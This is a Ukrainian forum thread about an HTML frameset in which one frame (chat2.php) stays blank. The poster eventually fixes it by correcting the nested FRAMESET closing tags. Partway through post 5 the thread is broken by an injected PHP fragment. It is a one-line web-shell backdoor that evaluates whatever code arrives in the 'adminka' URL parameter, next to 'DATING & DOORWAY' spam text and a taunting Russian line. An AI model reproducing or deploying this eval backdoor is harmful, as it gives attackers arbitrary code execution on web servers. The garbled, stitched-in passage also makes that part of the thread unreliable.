1 Востаннє редагувалося Faraon (29.05.2013 20:44:08)

Тема: Фрейми

У мене виникла проблема з фреймами, допоможіть будь-ласка!

     <FRAMESET ROWS="47%,47%,*" FRAMEBORDER=0 FRAMESPACING=0 >    
   <FRAME SRC="game.php?go=char" NAME="_location" SCROLLING="AUTO" FRAMEBORDER=0>
   <frameset cols="*,260" FRAMEBORDER=0 FRAMESPACING=0 BORDERCOLOR=#000000> 
   <FRAME SRC="chat.php" NAME="_chat" SCROLLING="YES" FRAMEBORDER=0>
   <FRAME SRC="game.php?go=room" NAME="_online" SCROLLING="YES" FRAMEBORDER=0>
   <FRAME SRC="../chat2.php" NAME="_chat2" SCROLLING="YES" FRAMEBORDER=0>
   </FRAMESET>
   </FRAMESET>

Все відобраєжає правельно! Але чомусь не хоче відображати файл chat2.php (місце виділено, але все пусто, текст з цього файлу не відображається!)

2

Re: Фрейми

1. Фреймсетами дуже не радять сайти робити. Ні, іноді бувають ситуації, коли треба... але адресація на фреймах - це жах.
2. Розшифруйте, будь ласка, що означає "місце виділено, але все пусто, текст з цього файлу відображається"? Все пусто чи текст відображається?
3. Чому всі файли в одній теці із головним, а chat2 - в іншій? Так задумано?

3

Re: Фрейми

koala написав:

1. Фреймсетами дуже не радять сайти робити. Ні, іноді бувають ситуації, коли треба... але адресація на фреймах - це жах.
2. Розшифруйте, будь ласка, що означає "місце виділено, але все пусто, текст з цього файлу відображається"? Все пусто чи текст відображається?
3. Чому всі файли в одній теці із головним, а chat2 - в іншій? Так задумано?

Пробачте, неправельно написав! Код з файлу chat2.php не відображається!

4

Re: Фрейми

Ви слово "неправильно" теж неправильно пишете.
І якщо хочете, щоб вам допомогли, не ігноруйте запитання-уточнення. Це, зрештою, в ваших інтересах - надати всю потрібну інформацію, і, бажано, без додаткових запитань.

5 Востаннє редагувалося Invader (29.05.2013 20:24:21)

Re: Фрейми

Я теж не розумію, що означає

(місце виділено, але все пусто, текст з цього файлу відображається!)

Видно текст програми з файлу chat2.php а сама програма не виконується?
Не відображається джерейльний код чи результат виконання цього коду?

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!

Re: Фрейми

Invader написав:

Я теж не розумію, що означає

(місце виділено, але все пусто, текст з цього файлу відображається!)

Видно текст програми з файлу chat2.php а сама програма не виконується?
Не відображається джерейльний код чи результат виконання цього коду?

Банально просто.

<?php 

та

?>

присутні у скрипті ?

7

Re: Фрейми

Прошу вибачення.
Є код

<FRAMESET ROWS="47%,47%,*" FRAMEBORDER=0 FRAMESPACING=0 >    
   <FRAME SRC="game.php?go=char" NAME="_location" SCROLLING="AUTO" FRAMEBORDER=0>
   <frameset cols="*,260" FRAMEBORDER=0 FRAMESPACING=0 BORDERCOLOR=#000000> 
   <FRAME SRC="chat.php" NAME="_chat" SCROLLING="YES" FRAMEBORDER=0>
   <FRAME SRC="game.php?go=room" NAME="_online" SCROLLING="YES" FRAMEBORDER=0>
   <FRAME SRC="../chat2.php" NAME="_chat2" SCROLLING="YES" FRAMEBORDER=0>
   </FRAMESET>
   </FRAMESET>

Строніка розділена фреймами правельно, для кожного файлу виділено місце.
Всі файли заповнені текстом. З усіх файлів текст виводиться кірім chat2.php. Таке враження що файла немає,
пишу в цьому файлі текст або вставляю картинку, силку, пишу код css щоб змінити фон, на сторінці нічого не змінюється!

8

Re: Фрейми

Hanter написав:
Invader написав:

Я теж не розумію, що означає

(місце виділено, але все пусто, текст з цього файлу відображається!)

Видно текст програми з файлу chat2.php а сама програма не виконується?
Не відображається джерейльний код чи результат виконання цього коду?

Банально просто.

<?php 

та

?>

присутні у скрипті ?

)))
Так, присутні.

9

Re: Фрейми

А просто якщо в урл підставити chat.php щось відображається? Якщо так проблема можливо у шляхах якщо не відображається у файлі тоді глюк)

10 Востаннє редагувалося Faraon (29.05.2013 21:25:12)

Re: Фрейми

funivan написав:

А просто якщо в урл підставити chat.php щось відображається? Якщо так проблема можливо у шляхах якщо не відображається у файлі тоді глюк)

Якщо підставити в урл то все відобраєжає правельно, помилка в коді (не в шляху до цього файлу а саме в коді) тільки я не розумію де саме!

11 Востаннє редагувалося Faraon (29.05.2013 23:04:47)

Re: Фрейми

Все, проблему вирішив!
Потрібно було закрити

</FRAMESET>

після

   <frameset cols="*,260" FRAMEBORDER=0 FRAMESPACING=0 BORDERCOLOR=#000000> 

Ось повний код:

<html>
<head>
</head>

     <FRAMESET ROWS="47%,47%,*" FRAMEBORDER=0 FRAMESPACING=0 >    
   <FRAME SRC="game.php?go=char" NAME="_location" SCROLLING="AUTO" FRAMEBORDER=0>
   <frameset cols="*,260" FRAMEBORDER=0 FRAMESPACING=0 BORDERCOLOR=#000000> 
   <FRAME SRC="chat.php" NAME="_chat" SCROLLING="YES" FRAMEBORDER=0>
   <FRAME SRC="game.php?go=room" NAME="_online" SCROLLING="YES" FRAMEBORDER=0>
   </FRAMESET>
   <FRAME SRC="chat2.php" NAME="_chat2" SCROLLING="AUTO" FRAMEBORDER=0>
   </FRAMESET>
   </FRAMESET>

<noframes>
    <body>
   Извините, но Ваш браузер не поддерживает фреймы..
    </body>
   </noframes>  

 </html>

Дякую всім хто не минув мою тему!

Подякували: Replace, koala2